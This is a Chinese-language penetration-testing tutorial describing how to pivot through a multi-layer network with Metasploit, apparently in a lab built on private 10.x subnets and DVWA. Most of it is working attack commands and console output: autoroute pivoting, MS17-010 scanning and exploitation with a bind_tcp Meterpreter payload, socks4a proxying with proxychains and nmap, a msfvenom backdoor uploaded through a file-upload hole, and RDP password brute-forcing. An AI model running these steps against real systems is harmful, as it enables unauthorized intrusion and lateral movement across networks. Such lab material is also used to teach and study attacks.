使用msf入侵多層級網絡架構

假設，有一個多層網絡環境結構，每層靶機只與相鄰服務器互通，那么，如何從Hack的筆記本去獲取Server5（10.0.3.2）的系統權限呢？

首先，我們通過Web入侵獲得Server1權限，並通過橫向滲透到Server2，探測到Server2存在雙網卡。在這里，我們以Server2作為攻擊跳板機繼續入侵。

第1層靶機→第2靶機
1、獲取內網網段信息

meterpreter > run get_local_subnets
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 10.0.0.0/255.255.255.0
Local subnet: 10.0.1.0/255.255.255.0

通過內網本地路由查詢，可以獲悉內網網段地址為：10.0.1.0/24。
2、添加去往第二層內網網段（10.0.1.0/24）的靜態路由。

meterpreter > run autoroute -s 10.0.1.0/24
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 10.0.1.0/255.255.255.0...
[+] Added route to 10.0.1.0/255.255.255.0 via 10.0.0.3
[*] Use the -p option to list all active routes

3、掃描內網主機，使用msf下的掃描模塊對IP段進行掃描看是否存來MS17-010漏洞。

use auxiliary/scanner/smb/smb_ms17_010 
show options
set rhosts 10.0.1.0/24
set threads 50
run

通過掃描發現10.0.1.2存在MS-17010漏洞。
4、通過MS-17010漏洞獲取Server3的系統權限。

 use exploit/windows/smb/ms17_010_psexec
 set rhost 10.0.1.2
 set payload windows/meterpreter/bind_tcp
 run

成功獲取第二層靶機權限，查看ip地址，發現第三個網段。

第2層靶機→第3靶機
添加第三個網段的靜態理由。

meterpreter > run autoroute -s 10.0.2.0/24
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 10.0.2.0/255.255.255.0...
[+] Added route to 10.0.2.0/255.255.255.0 via 10.0.1.2
[*] Use the -p option to list all active routes

使用MS17-010掃描無果，發現10.0.2.2主機存活，利用msf搭建socks代理

use auxiliary/server/socks4a
set srvport 9999
run

在攻擊機Kali中，修改配置文件/etc/proxychains.conf

socks4 10.0.0.2 9999

使用proxychains 對第三層靶機進行端口掃描：

proxychains nmap -Pn -sT 10.0.2.2 -p1-1000

在Firefox中設置socks代理。

本地就可以直接訪問到第三層靶機，在DVWA中，通過任意文件上傳msf后門，獲取站點權限。

利用msfvenom生成木馬后門：

msfvenom -p windows/meterpreter/bind_tcp LPORT=8888 -f exe > shell.exe

use exploit/multi/handler
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST 10.0.2.2
set LPORT 8888
set ExitOnSession false
exploit -j -z

在webshell中，上傳並成功執行shell.exe，成功返回Server4的權限。

第3層靶機→第4靶機
添加第四個網段的靜態理由。

meterpreter > run autoroute -s 10.0.3.0/24
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 10.0.3.0/255.255.255.0...
[+] Added route to 10.0.3.0/255.255.255.0 via 10.0.2.2
[*] Use the -p option to list all active routes

開啟socker

use auxiliary/server/socks4a
set srvport 6666
run

探測第四個網段存活的主機，發現10.0.3.2 開放了3389端口。

proxychains nmap -Pn -sT 10.0.3.0/24 -p22,80,3389

將第四層目標主機的3389流量轉發到代理服務器中：

在本地對RDP賬號密碼進行爆破：

爆破成功后，使用賬號密碼成功登錄服務器。

​